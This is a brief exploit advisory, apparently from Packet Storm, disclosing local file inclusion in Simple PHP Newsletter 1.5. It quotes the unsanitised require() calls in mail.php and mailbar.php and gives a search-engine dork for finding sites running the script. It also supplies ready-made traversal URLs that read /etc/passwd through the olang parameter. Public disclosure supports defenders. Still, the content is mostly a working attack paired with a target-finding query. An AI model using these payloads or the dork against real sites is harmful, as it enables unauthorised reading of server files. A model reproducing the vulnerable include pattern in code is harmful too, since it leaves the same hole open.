Simple PHP Newsletter version 1.5 suffers from local file inclusion vulnerabilities.
16a9eac6967ae7c80867bc2211fc6c0193eb8bbbeb3dfd869ec25d0f0fc0eda0 --:local file include:--
---------------------------------
script:Simple PHP Newsletter 1.5
----------------------------------------------
download from:http://quirm.net/download/23/
----------------------------------------------
...............................................
vul:/mail.php line 11:
if(isset($olang))
{
require("lang/".$olang); line 11
-------------------------------------------
vul:/mailbar.php line 5:
<?php
include("config.inc.php");
if(isset($olang))
{
require("lang/".$olang); line 5
-------------------------------------------
----------------------------------------------------
dork:"Powered by Simple PHP Text newsletter"
----------------------------------------------------
xpl:
http://127.0.0.1/path/mail.php?olang=../../../../../../etc/passwd
http://127.0.0.1/path/mailbar.php?olang=../../../../../../etc/passwd
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from:[iran]
---------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed